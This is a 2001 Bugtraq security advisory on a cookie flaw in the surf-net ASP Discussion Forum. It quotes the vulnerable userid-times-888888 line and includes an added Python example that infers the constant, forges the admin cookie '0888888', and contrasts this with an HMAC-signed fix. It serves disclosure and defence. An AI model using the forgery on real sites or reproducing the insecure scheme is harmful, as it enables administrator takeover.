Bugtraq mailing list archives

security problem in surf-net ASP Discussion Forum < 2.30


From: Mark Lastdrager <mark () pine nl>
Date: Mon, 20 Aug 2001 22:10:37 +0200 (MET DST)

Problem:
--------

The free surf-net ASP forum, which is downloadable at
http://www.surf-net.co.uk/asp/forum/forum_script.asp, contains at least one
major security hole that can be easily exploited by a malicious user.
The problem was discovered during a website audit.

Impact:
-------

Anyone can become the administrator of the message board.

Description:
------------

The forum sets a cookie 'userid' as soon as a user logs on (if the user
prefers cookies). This cookie appears to be some transformation of the
real userid. When auditing, we first got a cookie with userid '2666664'
(with real userid 3; the registration page returns this number), and after we
registered a second user with userid '3555552' (real userid 4) it wasn't hard
to guess that the admin user would have the userid '0888888' (thus real
userid 1). After changing the local cookie and restarting Netscape it
turned out we were right.

After that we found and downloaded the source code and discovered this at
line 89 of common.inc:

 lngLoggedInUserID = CLng(Request.Cookies("Forum")("UserID") / 888888)

Which of course is not a very secure way of doing things ;-)
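
The following is an added example, not code from the advisory or from the
surf-net forum itself. It re-implements the line-89 logic in Python to show
why the two observed cookies are enough to recover the constant and forge the
admin cookie, and then contrasts it with an HMAC-signed cookie that a client
cannot forge without the server's key. The cookie values and userids are the
ones quoted above; the HMAC scheme, key handling and function names are
assumptions for illustration.

```python
import hmac
import hashlib
import math
import secrets

# Constant taken from the advisory (line 89 of common.inc):
#   lngLoggedInUserID = CLng(Request.Cookies("Forum")("UserID") / 888888)
MULTIPLIER = 888888


def decode_forum_cookie(cookie_value: str) -> int:
    """Re-implements the vulnerable server-side check.

    VBScript's CLng rounds to the nearest integer (banker's rounding), as
    does Python's round(), so "2666664" -> 3 and "0888888" -> 1.
    """
    return round(int(cookie_value) / MULTIPLIER)


def encode_forum_cookie(userid: int) -> str:
    """What the forum hands out after login: userid * 888888, zero-padded
    to seven digits as observed in the advisory ('0888888' for userid 1)."""
    return f"{userid * MULTIPLIER:07d}"


def infer_multiplier(observed: list[tuple[str, int]]) -> int:
    """Attacker's view: with two or more (cookie, real userid) pairs from
    self-registered accounts, the constant falls out as the gcd of the
    cookie values (gcd(2666664, 3555552) == 888888)."""
    return math.gcd(*(int(cookie) for cookie, _ in observed))


def forge_cookie(target_userid: int, multiplier: int) -> str:
    """Cookie value an attacker sets locally to impersonate target_userid."""
    return f"{target_userid * multiplier:07d}"


# --- A hardened replacement (assumption, not the vendor's 2.30 fix) --------

def sign_cookie(userid: int, key: bytes) -> str:
    """Cookie carries the userid in the clear plus an HMAC-SHA256 tag over it.
    Without `key`, a client cannot produce a valid tag for another userid."""
    tag = hmac.new(key, str(userid).encode(), hashlib.sha256).hexdigest()
    return f"{userid}.{tag}"


def verify_signed_cookie(cookie_value: str, key: bytes):
    """Return the userid if the tag verifies, else None. compare_digest is
    constant-time so tag bytes do not leak through timing."""
    userid_text, sep, tag = cookie_value.partition(".")
    if not sep or not userid_text.isdigit():
        return None
    expected = hmac.new(key, userid_text.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return int(userid_text)


if __name__ == "__main__":
    # Constructed walk-through mirroring the audit described in the advisory.
    observed = [("2666664", 3), ("3555552", 4)]  # cookies seen for two registered users
    k = infer_multiplier(observed)                 # 888888
    admin_cookie = forge_cookie(1, k)              # "0888888"
    print(f"multiplier={k} forged admin cookie={admin_cookie} -> userid "
          f"{decode_forum_cookie(admin_cookie)}")

    key = secrets.token_bytes(32)                  # server-side secret, one per deployment (assumption)
    good = sign_cookie(3, key)
    tampered = "1." + good.split(".", 1)[1]        # reuse user 3's tag for userid 1
    print("signed cookie verifies:", verify_signed_cookie(good, key))
    print("tampered cookie verifies:", verify_signed_cookie(tampered, key))
```

The point of the signed variant is that the userid alone no longer grants
access; only the server can mint a valid tag. An opaque random session token
looked up in a server-side table achieves the same goal and avoids exposing
the userid at all.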

Solution:
---------

The author reacted within one day and fixed the problem. Fixed version 2.30
should be available at
http://www.surf-net.co.uk/asp/forum/forum_script.asp.

Mark Lastdrager

--
Pine Internet BV ::  tel. +31-70-3111010 ::  fax. +31-70-3111011
PGP 92BB81D1 fingerprint 0059 7D7B C02B 38D2 A853 2785 8C87 3AF1
Today's excuse: Forced to support NT servers; sysadmins quit.
